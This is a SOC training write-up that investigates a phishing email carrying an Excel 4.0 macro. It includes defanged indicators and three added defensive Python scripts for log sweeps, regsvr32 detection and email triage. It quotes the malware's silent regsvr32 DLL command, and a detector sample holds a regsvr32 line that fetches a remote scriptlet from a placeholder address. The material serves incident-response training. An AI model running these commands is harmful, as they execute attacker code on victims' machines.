LetsDefend — Phishing Mail Detected

SOC146 — Phishing Mail Detected — Excel 4.0 Macros

LetsDefend
LetsDefend is a platform for practical training for blue team members. You can improve your skills in log analysis, incident handling, malware analysis and endpoint analysis.


Today we will analyze a realistic phishing scenario. Phishing is a type of social engineering attack often used to steal user data, including login credentials and credit card numbers. The recipient is tricked into clicking a malicious link or opening a malicious attachment, which can lead to the installation of malware.

Monitoring

Our investigation starts at the Monitoring page, which simulates a real SOC environment. The alert details give us the sender address, the SMTP server address and more. Our next step is to copy the sender address and search for it in our mailbox.

Monitoring Window

Mailbox

By searching for the source address in the mailbox, we find the copy of the email that generated the alert.

Copy of the malicious email

We can extract important information from the email that will be useful later in the investigation:

  • Subject: RE: Meeting Notes
  • Sender: trenton@tritowncomputers[.]com
  • Recipient(s): lars@letsdefend.io
  • Attachment(s): 11f44531fb088d31307d87b01e8eabff.zip

Next, we will download the attachment and unzip it in a safe environment. In our case, we are using REMnux (https://remnux.org/).

After unzipping the attachment, we found three files, whose hashes we compute next.

Generating MD5

Using md5sum, a tool built into REMnux (and every Linux distribution), we calculate the hash of each file in the attachment. Hashes are useful for positively identifying a malware sample: the file is run through a hashing algorithm that produces a fingerprint which can be looked up in threat-intelligence databases. MD5 is still the most widely indexed hash, but it is cryptographically broken, so it is good practice to record the SHA-256 as well (sha256sum) alongside it.

Virus Total

Next, we perform a hash search on VirusTotal (VT). VT lets you search its dataset for files that match certain criteria. To look up a file by its MD5, just type the hash into the main search box.

Virus Total Result Window

According to VT, all three files are flagged as malicious. At the time of our scan, 30 antivirus engines flagged the Excel file and 8 flagged the DLL. The lower count on the DLL is not a sign that it is less dangerous: second-stage payloads are often tailored per campaign and are therefore seen by fewer engines.

Anyrun Sandbox

Any.Run is an interactive malware analysis sandbox. The service detonates a file, URL or executable and monitors its behaviour. It shows all processes in real time, so an analyst can observe malicious operations before the final report is produced.

Below are the results of the analysis of our malicious Excel file.

Anyrun Task Window

The sandbox detected unusual process activity. The workbook abuses Regsvr32.exe to proxy execution of malicious code (MITRE ATT&CK T1218.010, Signed Binary Proxy Execution: Regsvr32). This is a common pattern for Excel 4.0 (XLM) macros, which run legacy formula-based code from a macro sheet rather than VBA and so slip past controls that only inspect VBA. Regsvr32.exe is a signed Windows command-line program used to register and unregister object linking and embedding (OLE) controls, including DLLs.

Malicious use of regsvr32.exe may avoid triggering security tools that do not monitor the execution of, or the modules loaded by, the regsvr32.exe process: because Windows uses it for normal operations, it is frequently allowlisted or tuned out as a source of false positives.

The sandbox also detected malicious network traffic. The Excel file tries to communicate with two IP addresses known to be malicious.

Adversaries commonly mimic normal, expected traffic to avoid detection (ATT&CK T1071.001, Application Layer Protocol: Web Protocols). In our case the communication uses HTTPS on TCP port 443, so it blends in with ordinary web browsing. Commands to the victim, and often the results of those commands, are embedded within the protocol traffic between the client (victim) and the server (attacker).

IoCs

  • 188[.]213[.]19[.]81
  • 192[.]232[.]219[.]67
  • nws[.]visionconsulting[.]ro
  • royalpalm[.]sparkblue[.]lk
  • trenton@tritowncomputers[.]com
  • b775cd8be83696ca37b2fe00bcb40574
  • e03bde4862d4d93ac2ceed85abf50b18
  • 8e6fbefcbac2a1967941fa692c82c3ca

Log Management

We will now use the Log Management page to check whether the C2 addresses were accessed. There is a result for the first IP, 188[.]213[.]19[.]81: it was accessed by the host 172[.]16[.]17[.]57.

Log Management Window

By clicking on the magnifying glass, we can see the raw log data. It shows that the malicious domain was reached by the user and that the connection was allowed.

Raw Log Window

The same search for the second IP, 192[.]232[.]219[.]67, also returns a log entry.

Log Management Window

The raw log confirms that the second malicious domain was also reached from the same host and that the connection was allowed.

Raw Log Window
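The two searches above are a manual IoC sweep. The following script, added here as an illustration and not part of the original write-up or of the LetsDefend platform, automates the same check: it refangs the indicators from the IoC list and runs them over proxy log lines, grouping hits by source host and separating allowed from denied connections. The log lines and their key=value format are constructed for the example; real proxy or firewall exports will need their own parser.

```python
"""Sweep proxy/firewall log lines for contact with known C2 indicators.

Added example, not part of the original write-up. The indicators are the ones
from the IoC list above; the log lines are constructed and mimic a generic
key=value web-proxy format (an assumption, not any vendor's real format).
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List

# Defanged indicators copied from the IoC list above.
DEFANGED_IOCS = [
    "188[.]213[.]19[.]81",
    "192[.]232[.]219[.]67",
    "nws[.]visionconsulting[.]ro",
    "royalpalm[.]sparkblue[.]lk",
]

# Constructed sample log lines (not real telemetry). Assumed format:
# <timestamp> src=<ip> dst=<ip> host=<fqdn> dport=<port> action=<allow|deny>
SAMPLE_LOGS = """\
2021-06-13T14:12:03Z src=172.16.17.57 dst=188.213.19.81 host=nws.visionconsulting.ro dport=443 action=allow
2021-06-13T14:12:09Z src=172.16.17.57 dst=192.232.219.67 host=royalpalm.sparkblue.lk dport=443 action=allow
2021-06-13T14:13:44Z src=172.16.17.88 dst=142.250.74.46 host=www.google.com dport=443 action=allow
2021-06-13T14:15:01Z src=172.16.17.12 dst=188.213.19.81 host=nws.visionconsulting.ro dport=443 action=deny
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def refang(indicator: str) -> str:
    """Turn a defanged indicator back into a value that matches raw logs."""
    return indicator.replace("[.]", ".").replace("[:]", ":").replace("hxxp", "http")


def parse_line(line: str) -> Dict[str, str]:
    """Split one key=value log line into a dict; the leading token is the timestamp."""
    fields = dict(FIELD_RE.findall(line))
    fields["ts"] = line.split(" ", 1)[0]
    return fields


def sweep(log_text: str, defanged_iocs: Iterable[str]) -> Dict[str, List[Dict]]:
    """Return {source_host: [hits]} for every line whose dst IP or host is an IoC."""
    iocs = {refang(i) for i in defanged_iocs}
    hits = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = parse_line(line)
        matched = [v for v in (ev.get("dst"), ev.get("host")) if v in iocs]
        if matched:
            hits[ev["src"]].append({"ts": ev["ts"], "ioc": matched, "action": ev.get("action")})
    return dict(hits)


def hosts_with_allowed_c2(hits: Dict[str, List[Dict]]) -> List[str]:
    """Hosts whose C2 contact was allowed are the containment priority."""
    return sorted(h for h, evs in hits.items() if any(e["action"] == "allow" for e in evs))


if __name__ == "__main__":
    result = sweep(SAMPLE_LOGS, DEFANGED_IOCS)
    for host, evs in result.items():
        for e in evs:
            print(f"{e['ts']} {host} -> {', '.join(e['ioc'])} ({e['action']})")
    print("contain first:", hosts_with_allowed_c2(result))
```

A denied connection still means something on that host tried to reach the C2, so hosts that only appear in the deny list are not clean; they are simply lower priority for containment than the host whose traffic got through.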

Endpoint Management

Since the malicious IoCs (IPs and domains) were reached from the device 172[.]16[.]17[.]57, our next step is to contain the machine so that it can no longer beacon to the C2 servers or spread further.

Going to the Endpoint Security (EDR) page, we can contain the user machine.

Endpoint Security Window

Looking at the details provided by the EDR, we can dig deeper into the command history, network connections and process list.

In the command history, we can see that the command “regsvr32.exe -s ../iroto.dll” was executed on the endpoint.

Command History Window

The network connections view showed once again that the endpoint was communicating with the malicious IPs.

Network Connections Window

And finally, the process history tree showed that the process “regsvr32.exe” was spawned by the parent process “excel.exe” with the command line “regsvr32.exe -s iroto.dll”.

Process History Window
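The process tree above (excel.exe spawning regsvr32.exe with a silent flag and a DLL outside any system directory) is exactly the pattern a detection rule should encode, while a bare "/s" from an installer must not fire. The script below is an added example, not code from the original write-up or from LetsDefend, Sysmon or any EDR vendor: it scores constructed process-creation events with the weighted indicators of regsvr32 proxy execution (Office parent, silent flag, untrusted DLL location, the /i:URL /n scriptlet pattern) and alerts only above a threshold. The field names parent_image, image and command_line are an assumption mirroring Sysmon Event ID 1 telemetry, and the events, including the 203.0.113.5 documentation address, are made up.

```python
"""Score regsvr32.exe process-creation events for proxy execution (ATT&CK T1218.010).

Added example, not code from the original write-up or from LetsDefend/Sysmon.
The events below are constructed; the field names parent_image, image and
command_line are an assumption mirroring Sysmon Event ID 1 / EDR telemetry.
"""
import shlex
from typing import Dict, List

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
# Directories where a legitimately registered COM server DLL normally lives.
TRUSTED_DLL_DIRS = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)
ALERT_THRESHOLD = 2  # a lone /s is routine installer behaviour and must not alert by itself


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: Dict[str, str]) -> Dict:
    """Return a score and the human-readable reasons behind it (0 for non-regsvr32 events)."""
    if basename(ev["image"]) != "regsvr32.exe":
        return {"score": 0, "reasons": []}
    # posix=False keeps Windows backslashes and quoted paths intact.
    args = shlex.split(ev["command_line"], posix=False)[1:]
    flags, remote, targets = {}, [], []
    for a in args:
        if a.startswith(("/", "-")):
            name, _, value = a.lstrip("/-").partition(":")  # handles /i:http://...
            flags[name.lower()] = value
            if value.lower().startswith(("http://", "https://")):
                remote.append(value)
        else:
            targets.append(a.strip('"'))

    score, reasons = 0, []
    parent = basename(ev.get("parent_image", ""))
    if parent in OFFICE_PARENTS:
        score += 3
        reasons.append(f"spawned by Office process {parent}")
    if "s" in flags:
        score += 1
        reasons.append("/s suppresses the registration dialog")
    if "i" in flags and "n" in flags:
        score += 3
        reasons.append("/i with /n runs DllInstall without DllRegisterServer (scriptlet pattern)")
    for url in remote:
        score += 3
        reasons.append(f"remote scriptlet {url}")
    for t in targets:
        if not t.lower().startswith(TRUSTED_DLL_DIRS):
            score += 2
            reasons.append(f"DLL outside trusted directories: {t}")
    return {"score": score, "reasons": reasons}


def triage(events: List[Dict[str, str]]) -> List[Dict]:
    """Return the events that cross ALERT_THRESHOLD, with their scores and reasons."""
    alerts = []
    for idx, ev in enumerate(events):
        verdict = score_event(ev)
        if verdict["score"] >= ALERT_THRESHOLD:
            alerts.append({"event": idx, "command_line": ev["command_line"], **verdict})
    return alerts


# Constructed events (not real telemetry). Event 0 mirrors the process tree in the write-up;
# event 1 is a benign installer; event 3 is the classic remote-scriptlet abuse.
SAMPLE_EVENTS = [
    {"parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE",
     "image": "C:\\Windows\\System32\\regsvr32.exe",
     "command_line": "regsvr32.exe -s ../iroto.dll"},
    {"parent_image": "C:\\Windows\\System32\\msiexec.exe",
     "image": "C:\\Windows\\System32\\regsvr32.exe",
     "command_line": '"C:\\Windows\\System32\\regsvr32.exe" /s "C:\\Program Files\\Vendor\\codec.dll"'},
    {"parent_image": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe",
     "command_line": "notepad.exe notes.txt"},
    {"parent_image": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\regsvr32.exe",
     "command_line": "regsvr32.exe /s /n /u /i:http://203.0.113.5/a.sct scrobj.dll"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(f"event {alert['event']} score={alert['score']}: {alert['command_line']}")
        for r in alert["reasons"]:
            print("   -", r)
```

The weights are a starting point to tune against your own baseline: the Office-parent and remote-URL conditions are strong enough to alert on their own, whereas the silent flag only adds context, which is what keeps normal software installation out of the alert queue.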

Case Management Detail

We now have enough information to conclude that the alert is a true positive and that an incident should be opened.

We can answer the questions of the playbook with the information we’ve collected during our analysis.

Case Management Window

Playbook

A security playbook is a list of required steps and actions needed to successfully respond to any incident or threat. Playbooks provide a step-by-step approach to orchestration, helping security teams to establish standardized incident response processes and ensuring the steps are followed in compliance with regulatory frameworks.

Playbook Window
  • When was it sent?
    June 13, 2021 2:11 PM
  • What is the email’s SMTP address?
    24.213.228.54
  • What is the sender address?
    trenton@tritowncomputers[.]com
  • What is the recipient address?
    lars@letsdefend.io
  • Is the mail content suspicious?
    Yes.
  • Are there any attachments?
    Yes.
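Every playbook answer above comes from the raw message headers, so the extraction is worth scripting. The following is an added example, not part of the original write-up or of LetsDefend's playbook: it parses an .eml with Python's standard email library and returns the sent date, the originating SMTP address from the earliest Received header, defanged sender and recipient, and the attachment names with their MD5 and SHA-256. The message is constructed to mirror the values recorded above; its Received hostname, message id, body text and attachment bytes are made up.

```python
"""Extract phishing-playbook answers from a raw .eml.

Added example, not part of the original write-up. The message below is
constructed to mirror the playbook answers above (date, sender, recipient,
SMTP address, attachment name); the Received hostname, ESMTP id, body text
and attachment bytes are made up for illustration.
"""
import email
import hashlib
import re
from email import policy
from email.utils import parsedate_to_datetime
from typing import Dict, Optional

SAMPLE_EML = b"""\
Received: from mail.tritowncomputers.com ([24.213.228.54])
\tby mx.letsdefend.io with ESMTP id abc123
\tfor <lars@letsdefend.io>; Sun, 13 Jun 2021 14:11:00 +0000
From: trenton@tritowncomputers.com
To: lars@letsdefend.io
Subject: RE: Meeting Notes
Date: Sun, 13 Jun 2021 14:11:00 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please find the notes attached.
--b1
Content-Type: application/zip; name="11f44531fb088d31307d87b01e8eabff.zip"
Content-Disposition: attachment; filename="11f44531fb088d31307d87b01e8eabff.zip"
Content-Transfer-Encoding: base64

UEsDBBQAAAAIAA==
--b1--
"""

RECEIVED_IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def defang(value: str) -> str:
    """Defang an address or domain so it cannot be clicked from a report."""
    return value.replace(".", "[.]")


def originating_ip(msg) -> Optional[str]:
    """The bottom-most Received header is the first hop, i.e. the sending SMTP server."""
    received = msg.get_all("Received", [])
    if not received:
        return None
    match = RECEIVED_IP_RE.search(str(received[-1]))
    return match.group(1) if match else None


def triage(raw: bytes) -> Dict:
    msg = email.message_from_bytes(raw, policy=policy.default)
    attachments = []
    for part in msg.iter_attachments():
        data = part.get_payload(decode=True) or b""
        attachments.append({
            "filename": part.get_filename(),
            "size": len(data),
            "md5": hashlib.md5(data).hexdigest(),
            "sha256": hashlib.sha256(data).hexdigest(),
        })
    return {
        "sent": parsedate_to_datetime(str(msg["Date"])).isoformat(),
        "smtp_address": originating_ip(msg),
        "sender": defang(str(msg["From"])),
        "recipient": defang(str(msg["To"])),
        "subject": str(msg["Subject"]),
        "has_attachment": bool(attachments),
        "attachments": attachments,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_EML).items():
        print(f"{key}: {value}")
```

The bottom-most Received header is the one the sender's server added and can be forged; the Received line written by your own mail gateway is the trustworthy record of where the connection really came from, so confirm the SMTP address against that hop when the two disagree.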
